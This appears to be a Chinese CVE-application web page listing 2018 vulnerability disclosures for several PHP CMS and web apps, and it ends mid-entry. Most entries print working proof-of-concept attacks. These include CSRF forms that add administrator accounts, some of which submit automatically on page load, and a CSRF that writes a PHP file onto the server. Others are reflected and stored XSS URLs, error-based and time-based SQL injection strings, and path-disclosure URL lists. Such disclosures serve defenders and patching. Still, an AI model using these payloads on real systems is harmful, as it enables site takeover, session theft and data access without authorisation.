CVE中文申请站

CVE-2018-12603:LFCMS 3.7.0存在CSRF漏洞可添加任意管理员账户

一、漏洞摘要

漏洞名称: LFCMS 3.7.0存在CSRF漏洞可添加任意管理员账户
上报日期: 2018-06-20
漏洞发现者: Bay0net
产品首页: http://www.lfdycms.com/
软件链接: http://www.lfdycms.com/home/down/index/id/26.html
版本: 3.7.0
CVE编号: CVE-2018-12603


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面添加管理员账户对网站进行入侵。

三、利用代码

exp代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Member/add.html" method="POST">
      <input type="hidden" name="username" value="admin2" />
      <input type="hidden" name="password" value="admin2" />
      <input type="hidden" name="repassword" value="admin2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/44/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12603
漏洞发现者blog:https://www.cnblogs.com/v1vvwv/p/9203899.html
exploit-db:发布中

CVE-2018-12602:LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户

一、漏洞摘要

漏洞名称: LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户号
上报日期: 2018-06-20
漏洞发现者: Bay0net
产品首页: http://www.lfdycms.com/
软件链接: http://www.lfdycms.com/home/down/index/id/26.html
版本: 3.7.0
CVE编号: CVE-2018-12602


二、漏洞概述

攻击者可通过构造 CSRF 请求,来新增任意用户。

三、利用代码

exp代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Users/add.html" method="POST">
      <input type="hidden" name="username" value="test222" />
      <input type="hidden" name="email" value="test2@qq.com" />
      <input type="hidden" name="password" value="test222" />
      <input type="hidden" name="repassword" value="test222" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/43/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12602
漏洞发现者blog:https://www.cnblogs.com/v1vvwv/p/9203740.html
exploit-db:发布中

CVE-2018-12114:maccms_v10存在CSRF漏洞可增加任意账号

一、漏洞摘要

漏洞名称: maccms_v10存在CSRF漏洞可增加任意账号
上报日期: 2018-06-11
漏洞发现者: Bay0net
产品首页: http://www.maccms.com/
软件链接: http://www.maccms.com/down.html
版本: v10
CVE编号: CVE-2018-12114


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面添加管理员账户对网站进行入侵。

三、利用代码

exp代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/maccms10/admin.php/admin/admin/info.html" method="POST">
      <input type="hidden" name="admin_id" value="" />
      <input type="hidden" name="admin_name" value="test2" />
      <input type="hidden" name="admin_pwd" value="test2" />
      <input type="hidden" name="admin_status" value="1" />
      <input type="hidden" name="admin_auth[0]" value="index/welcome" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/42/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12114
漏洞发现者blog:https://www.cnblogs.com/v1vvwv/p/9168309.html
exploit-db:发布中

CVE-2018-12290:yii2-statemachine v2.x.x存在XSS漏洞

一、漏洞摘要

漏洞名称: yii2-statemachine v2.x.x存在XSS漏洞
上报日期: 2018-06-12
漏洞发现者: longer
产品首页: https://github.com/ptheofan/yii2-statemachine-demo
软件链接: https://github.com/ptheofan/yii2-statemachine-demo
版本: v2.x.x
CVE编号: CVE-2018-12290


二、漏洞概述

由于role参数过滤不严格,导致可以插入js代码造成跨站脚本攻击。如将role参数赋值为“guest'%22()%26%25<acx><ScRiPt%20>prompt(123555)</ScRiPt>”,并进行get方式提交,可造成跨站脚本攻击。
xss1.png

三、利用代码

exp代码如下:

https://127.0.0.1/?role=guest'%22()%26%25<acx><ScRiPt%20>prompt(123555)</ScRiPt>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/40/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12290
exploit-db:发布中

CVE-2018-11671:GreenCMS v2.3.0603存在CSRF漏洞可增加管理员账户

一、漏洞摘要

漏洞名称: GreenCMS v2.3.0603存在CSRF漏洞可增加管理员账户
上报日期: 2018-06-02
漏洞发现者: 惜潮
产品首页: https://github.com/GreenCMS/GreenCMS
软件链接: https://github.com/GreenCMS/GreenCMS
版本: v2.3.0603
CVE编号: CVE-2018-11671


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面添加管理员账户对网站进行入侵。GreenCMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

exp代码如下:

<span style="font-size:18px;"><!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <title>csrf测试</title>  
</head>  
  <body>  
        <form action="http://127.0.0.1//14/index.php?m=admin&c=access&a=adduserhandle" method="POST" id="transfer" name="transfer">  
        <input type="hidden" name="user_id0" value="1">  
        <input type="hidden" name="user_login" value="test1">  <!--在这里可以添加JS脚本用于获取cookies  csrf+xss-->
        <input type="hidden" name="password" value="test1">  
        <input type="hidden" name="rpassword" value="test1">  
        <input type="hidden" name="user_nicename" value="123">  
        <input type="hidden" name="user_email" value="123%40Qq.com">  
        <input type="hidden" name="user_url" value="www.baidu.com">  
        <input type="hidden" name="user_intro" value="test">  
        <input type="hidden" name="user_status" value="1">  
        <input type="hidden" name="role_id" value="1">
        <button type="submit" value="Submit">添加管理员</button>  
      </form>  
    </body>
</html></span>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/39/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11671
exploit-db:发布中

CVE-2018-11670:GreenCMS v2.3.0603存在CSRF漏洞可获取webshell

一、漏洞摘要

漏洞名称: GreenCMS v2.3.0603存在CSRF漏洞可获取webshell
上报日期: 2018-06-02
漏洞发现者: 惜潮
产品首页: https://github.com/GreenCMS/GreenCMS
软件链接: https://github.com/GreenCMS/GreenCMS
版本: v2.3.0603
CVE编号: CVE-2018-11670


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面 从而获取网站webshell。GreenCMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

exp代码如下:

<span style="font-size:18px;"><!DOCTYPE html> 
<html lang="en"> 
<head> 
    <meta charset="UTF-8"> 
    <title>csrf测试</title> 
</head> 
<form action="http://127.0.0.1//14/index.php?m=admin&c=media&a=fileconnect" method="POST" id="transfer" name="transfer">
    <!-- 下面的是生成文件名为xc.php的脚本文件 路径 127.0.0.1/Upload/xc.php -->
    <script src="http://127.0.0.1/14/index.php?m=admin&c=media&a=fileconnect&cmd=mkfile&name=xc.php&target=l1_XA&_=1527839615462"></script>
    <input type="hidden" name="cmd" value="put">
    <input type="hidden" name="target" value="l1_eGMucGhw">
     <input type="hidden" name="content" value="<?php phpinfo();?>">
    <!-- 下面的是提交表单 将content中的命令写入脚本内 -->
    <button type="submit" value="Submit">WebShell</button>
    </form>
    </body>
</html></span>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/38/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11670
exploit-db:发布中

CVE-2018-11559:DomainMod 4.10.0存在存储型XSS漏洞

一、漏洞摘要

漏洞名称: DomainMod 4.10.0存在存储型XSS漏洞
上报日期: 2018-05-30
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/domainmod/domainmod
软件链接: https://github.com/domainmod/domainmod
版本: 4.10.0
CVE编号: CVE-2018-11559


二、漏洞概述

DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_last_name”参数过滤不严格导致存在一个存储型XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发:

post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/37/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11559
exploit-db:发布中

CVE-2018-11558:DomainMod 4.10.0存在XSS漏洞

一、漏洞摘要

漏洞名称: DomainMod 4.10.0存在XSS漏洞
上报日期: 2018-05-30
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/domainmod/domainmod
软件链接: https://github.com/domainmod/domainmod
版本: 4.10.0
CVE编号: CVE-2018-11558


二、漏洞概述

DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_first_name”参数过滤不严格导致存在一个XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发:

post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/36/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11558
exploit-db:发布中

CVE-2018-11404:DomainMod v4.09.03的ssl-provider-account.php页面XSS漏洞

一、漏洞摘要

漏洞名称: DomainMod v4.09.03的ssl-provider-account.php页面XSS漏洞
上报日期: 2018-05-24
漏洞发现者: longer
产品首页: https://github.com/domainmod/domainmod
软件链接: https://github.com/domainmod/domainmod
版本: 4.09.03
CVE编号: CVE-2018-11404


二、漏洞概述

DomainMod v4.09.03版本的“assets/edit/ssl-provider-account.php”页面的“sslpaid”参数存在一个XSS漏洞,当用户登陆后访问url“http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E”会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/15/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11404
exploit-db:https://www.exploit-db.com/exploits/44783/

CVE-2018-11403:DomainMod v4.09.03的account-owner.php页面XSS漏洞

一、漏洞摘要

漏洞名称: DomainMod v4.09.03的account-owner.php页面XSS漏洞
上报日期: 2018-05-24
漏洞发现者: longer
产品首页: https://github.com/domainmod/domainmod
软件链接: https://github.com/domainmod/domainmod
版本: 4.09.03
CVE编号: CVE-2018-11403


二、漏洞概述

DomainMod v4.09.03版本的“assets/edit/account-owner.php”页面的“oid”参数存在一个XSS漏洞,当用户登陆后访问url“http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E”会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/14/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11403
exploit-db:https://www.exploit-db.com/exploits/44782/

CVE-2018-9927:五指CMS 4.1.0存在CSRF漏洞可增加用户账户

一、漏洞摘要

漏洞名称: 五指CMS 4.1.0存在CSRF漏洞可增加用户账户
上报日期: 2018-04-10
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/wuzhicms/wuzhicms
软件链接: https://github.com/wuzhicms/wuzhicms
版本: 4.1.0
CVE编号: CVE-2018-9927


二、漏洞概述

五指CMS 4.1.0版本存在一个CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可增加普通用户账户。五指CMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='info[username]' value='hack123' />";
fields += "<input type='hidden' name='info[password]' value='hacktest' />"; 
fields += "<input type='hidden' name='info[pwdconfirm]' value='hacktest' />"; 
fields += "<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />"; 
fields += "<input type='hidden' name='info[mobile]' value='' />"; 
fields += "<input type='hidden' name='modelids[]' value='10' />"; 
fields += "<input type='hidden' name='info[groupid]' value='3' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='avatar' value='' />"; 
fields += "<input type='hidden' name='islock' value='0' />";
fields += "<input type='hidden' name='sys_name' value='0' />";
fields += "<input type='hidden' name='info[birthday]' value='' />"; 
fields += "<input type='hidden' name='info[truename]' value='' />"; 
fields += "<input type='hidden' name='info[sex]' value='0' />";
fields += "<input type='hidden' name='info[marriage]' value='0' />";

var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=提交";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/7/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9927
exploit-db:https://www.exploit-db.com/exploits/44440/

CVE-2018-9926:五指CMS 4.1.0存在CSRF漏洞可增加管理员账户

一、漏洞摘要

漏洞名称: 五指CMS 4.1.0存在CSRF漏洞可增加管理员账户
上报日期: 2018-04-10
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/wuzhicms/wuzhicms
软件链接: https://github.com/wuzhicms/wuzhicms
版本: 4.1.0
CVE编号: CVE-2018-9926


二、漏洞概述

五指CMS 4.1.0版本存在一个CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可将普通用户提成为管理员权限。五指CMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

    <html><body>
    <script type="text/javascript">
    function post(url,fields)
    {
    var p = document.createElement("form");
    p.action = url;
    p.innerHTML = fields;
    p.target = "_self";
    p.method = "post";
    document.body.appendChild(p);
    p.submit();
    }
    function csrf_hack()
    {
    var fields;
    
    fields += "<input type='hidden' name='form[role][]' value='1' />";
    fields += "<input type='hidden' name='form[username]' value='hack123' />"; 
    fields += "<input type='hidden' name='form[password]' value='' />"; 
    fields += "<input type='hidden' name='form[truename]' value='taoge@5ecurity' />"; 
    
    var url = "http://127.0.0.1/www/index.php?m=core&f=power&v=add&&_su=wuzhicms&_menuid=61&_submenuid=62&submit=提交";
    post(url,fields);
    }
    window.onload = function() { csrf_hack();}
    </script>
    </body></html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/6/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9926
exploit-db:https://www.exploit-db.com/exploits/44439/

CVE-2018-8770:Cobub Razor 0.8.0存在物理路径泄露漏洞

一、漏洞摘要

漏洞名称: Cobub Razor 0.8.0存在物理路径泄露漏洞
上报日期: 2018-04-20
漏洞发现者: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
产品首页: http://www.cobub.com/
软件链接: https://github.com/cobub/razor/
版本: 0.8.0
CVE编号: CVE-2018-8770


二、漏洞概述

Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统。

三、利用代码

HTTP Method: GET
http://localhost/tests/generate.php
http://localhost/tests/controllers/getConfigTest.php
http://localhost/tests/controllers/getUpdateTest.php
http://localhost/tests/controllers/postclientdataTest.php
http://localhost/tests/controllers/posterrorTest.php
http://localhost/tests/controllers/posteventTest.php
http://localhost/tests/controllers/posttagTest.php
http://localhost/tests/controllers/postusinglogTest.php
http://localhost/tests/fixtures/Controller_fixt.php
http://localhost/tests/fixtures/Controller_fixt2.php
http://localhost/tests/fixtures/view_fixt2.php
http://localhost/tests/libs/ipTest.php
http://localhost/tests/models/commonDbfix.php


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/31/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770
EXPLOIT-DB:https://www.exploit-db.com/exploits/44495/

CVE-2018-8056:Cobub Razor 0.8.0存在物理路径泄露漏洞

一、漏洞摘要

漏洞名称: Cobub Razor 0.8.0存在物理路径泄露漏洞
上报日期: 2018-04-20
漏洞发现者: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
产品首页: http://www.cobub.com/
软件链接: https://github.com/cobub/razor/
版本: 0.8.0
CVE编号: CVE-2018-8056


二、漏洞概述

Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

URL: http://localhost/export.php
HTTP Method: GET
URL: http://localhost/index.php?/manage/channel/addchannel
HTTP Method: POST
Data: channel_name=test"&platform=1


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/29/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8056
EXPLOIT-DB:https://www.exploit-db.com/exploits/44495/

CVE-2018-8057:Cobub Razor 0.8.0存在SQL注入漏洞

一、漏洞摘要

漏洞名称: Cobub Razor 0.8.0存在SQL注入漏洞
上报日期: 2018-04-16
漏洞发现者: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
产品首页: http://www.cobub.com/
软件链接: https://github.com/cobub/razor/
版本: 0.8.0
CVE编号: CVE-2018-8057


二、漏洞概述

Cobub Razor 0.8.0存在SQL注入漏洞,“/application/controllers/manage/channel.php”页面的“channel_name”及“platform”参数过滤不严格导致存在SQL注入漏洞。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

http://localhost/index.php?/manage/channel/addchannel
POST data:
1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1
2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/30/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8057
EXPLOIT-DB:https://www.exploit-db.com/exploits/44454/

CVE-2018-7745:Cobub Razor 0.7.2越权增加管理员账户

一、漏洞摘要

漏洞名称: Cobub Razor 0.7.2越权增加管理员账户
上报日期: 2018-04-09
漏洞发现者: ppb(ppb@5ecurity.cn)
产品首页: https://github.com/cobub/razor/
软件链接: https://github.com/cobub/razor/
版本: 0.72
CVE编号: CVE-2018-7745


二、漏洞概述

Cobub Razor 0.7.2越权增加管理员账户漏洞,在不登录的情况下发送特定数据包,可新增管理员账号。保存如下利用代码为html页面,打开页面将增加test/test123的管理员账号,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

利用代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST">
      <input type="hidden" name="siteurl" value="http://127.0.0.1/" />
      <input type="hidden" name="superuser" value="test" />
      <input type="hidden" name="pwd" value="test123" />
      <input type="hidden" name="verifypassword" value="test123" />
      <input type="hidden" name="email" value="12@qq.com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/24/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7745
exploit-db:https://www.exploit-db.com/exploits/44419/

CVE-2018-7746:Cobub Razor 0.7.2存在跨站请求伪造漏洞

一、漏洞摘要

漏洞名称: Cobub Razor 0.7.2存在跨站请求伪造漏洞
上报日期: 2018-04-06
漏洞发现者: ppb(ppb@5ecurity.cn)
产品首页: https://github.com/cobub/razor/
软件链接: https://github.com/cobub/razor/
版本: 0.72
CVE编号: CVE-2018-7746


二、漏洞概述

Cobub Razor 0.7.2存在跨站请求伪造漏洞,在不登录的情况下发送特定数据包,可在频道管理页面增加频道项目。保存如下利用代码为html页面,打开页面将在/index.php?/manage/channel页面增加频道项目,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

利用代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/index.php?/manage/channel/modifychannel" method="POST">
      <input type="hidden" name="channel_id" value="979" />
      <input type="hidden" name="channel_name" value="xss><svg/onload=alert(1)>" />
      <input type="hidden" name="platform" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/26/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7746
exploit-db:https://www.exploit-db.com/exploits/44416/

CVE-2018-7653:YzmCMS 3.6存在XSS漏洞

一、漏洞摘要

漏洞名称: YzmCMS 3.6存在XSS漏洞
上报日期: 2018-04-05
漏洞发现者: zzw (zzw@5ecurity.cn)
产品首页: http://www.yzmcms.com/
软件链接: http://www.yzmcms.com/
版本: 3.6
CVE编号: CVE-2018-7653


二、漏洞概述

YzmCMS 3.6版本的 index.php页面a、c、m参数过滤不严格可导致跨站脚本漏洞。

三、利用代码

poc代码:
poc:

http://localhost/YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes 
 
http://localhost/YzmCMS/index.php?m=search&c=indexf9q6s%3cimg%20src%3da%20onerror%3dalert(1)%3ej4yck&a=init&modelid=1&q=tes 
 
http://localhost/YzmCMS/index.php?m=searchr81z4%3cimg%20src%3da%20onerror%3dalert(1)%3eo92wf&c=index&a=init&modelid=1&q=tes 
 
http://localhost/YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/26/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7653
exploit-db:https://www.exploit-db.com/exploits/44405/
MISC:https://packetstormsecurity.com/files/147065/YzmCMS-3.6-Cross-Site-Scripting.html

CVE-2018-7737:Z-Blog 1.5.1.1740存在路径泄露漏洞

一、漏洞摘要

漏洞名称: Z-Blog 1.5.1.1740存在路径泄露漏洞
上报日期: 2018-04-05
漏洞发现者: zzw (zzw@5ecurity.cn)
产品首页: https://www.zblogcn.com/
软件链接: https://github.com/zblogcn/zblogphp
版本: 1.5.1.1740
CVE编号: CVE-2018-7737


二、漏洞概述

Z-BlogPHP 1.5.1.1740版本多个页面存在路径泄露漏洞。

三、利用代码

访问如下页面,报错信息中显示完整物理路径信息。

http://localhost/z-blog//zb_system/admin/admin_footer.php
http://localhost/z-blog//zb_system/admin/admin_header.php
http://localhost/z-blog//zb_system/admin/admin_left.php
http://localhost/z-blog//zb_system/admin/admin_top.php
http://localhost/z-blog//zb_system/function/c_system_admin.php
http://localhost/z-blog//zb_system/function/c_system_misc.php
http://localhost/z-blog//zb_system/function/lib/category.php
http://localhost/z-blog//zb_system/function/lib/comment.php
http://localhost/z-blog//zb_system/function/lib/dbmysql.php
http://localhost/z-blog//zb_system/function/lib/dbmysqli.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_mysql.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_pgsql.php
http://localhost/z-blog//zb_system/function/lib/dbpdo_sqlite.php
http://localhost/z-blog//zb_system/function/lib/dbpgsql.php
http://localhost/z-blog//zb_system/function/lib/dbsqlite.php
http://localhost/z-blog//zb_system/function/lib/dbsqlite3.php
http://localhost/z-blog//zb_system/function/lib/member.php
http://localhost/z-blog//zb_system/function/lib/module.php
http://localhost/z-blog//zb_system/function/lib/networkcurl.php
http://localhost/z-blog//zb_system/function/lib/networkfile_get_contents.php
http://localhost/z-blog//zb_system/function/lib/networkfsockopen.php
http://localhost/z-blog//zb_system/function/lib/post.php
http://localhost/z-blog//zb_system/function/lib/sqlmysql.php
http://localhost/z-blog//zb_system/function/lib/sqlpgsql.php
http://localhost/z-blog//zb_system/function/lib/sqlsqlite.php
http://localhost/z-blog//zb_system/function/lib/tag.php
http://localhost/z-blog//zb_system/function/lib/upload.php
http://localhost/z-blog//zb_users/cache/compiled/default/comment.php
http://localhost/z-blog//zb_users/cache/compiled/default/comments.php
http://localhost/z-blog//zb_users/cache/compiled/default/index.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-archives.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-authors.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-catalog.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-comments.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-previous.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-statistics.php
http://localhost/z-blog//zb_users/cache/compiled/default/module-tags.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-multi.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-page.php
http://localhost/z-blog//zb_users/cache/compiled/default/post-single.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar2.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar3.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar4.php
http://localhost/z-blog//zb_users/cache/compiled/default/sidebar5.php
http://localhost/z-blog//zb_users/cache/compiled/default/single.php
http://localhost/z-blog//zb_users/plugin/AppCentre/include.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkcurl.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkfile_get_contents.php
http://localhost/z-blog//zb_users/plugin/AppCentre/networkfsockopen.php
http://localhost/z-blog//zb_users/plugin/STACentre/include.php
http://localhost/z-blog//zb_users/plugin/Totoro/include.php
http://localhost/z-blog//zb_users/plugin/UEditor/include.php
http://localhost/z-blog//zb_users/plugin/UEditor/php/action_crawler.php
http://localhost/z-blog//zb_users/plugin/UEditor/php/action_upload.php
http://localhost/z-blog//zb_users/theme/default/include.php
http://localhost/z-blog//zb_users/theme/metro/include.php
http://localhost/z-blog//zb_users/theme/WhitePage/include.php

报错信息如下:

Fatal error: Interface 'iDataBase' not found in C:\phpStudy\WWW\Z-Blog\zb_system\function\lib\dbsqlite3.php on line 8


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/24/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7737
exploit-db:https://www.exploit-db.com/exploits/44407/
MISC:https://packetstormsecurity.com/files/147063/Z-Blog-1.5.1.1740-Full-Path-Disclosure.html

CVE-2018-7736:Z-Blog 1.5.1.1740存在XSS漏洞

一、漏洞摘要

漏洞名称: Z-Blog 1.5.1.1740存在XSS漏洞
上报日期: 2018-04-05
漏洞发现者: zzw (zzw@5ecurity.cn)
产品首页: https://www.zblogcn.com/
软件链接: https://github.com/zblogcn/zblogphp
版本: 1.5.1.1740
CVE编号: CVE-2018-7736


二、漏洞概述

Z-BlogPHP 1.5.1.1740版本的cmd.php页面ZC_BLOG_SUBNAME及ZC_UPLOAD_FILETYPE参数过滤不严格可导致跨站脚本漏洞。

三、利用代码

ZC_BLOG_SUBNAME参数poc代码:

post_url:http://localhost/z-blog/zb_system/cmd.php?act=SettingSav&token=2c7ca9a4c1c3d856e012595ca878564f
 
post_data:
 
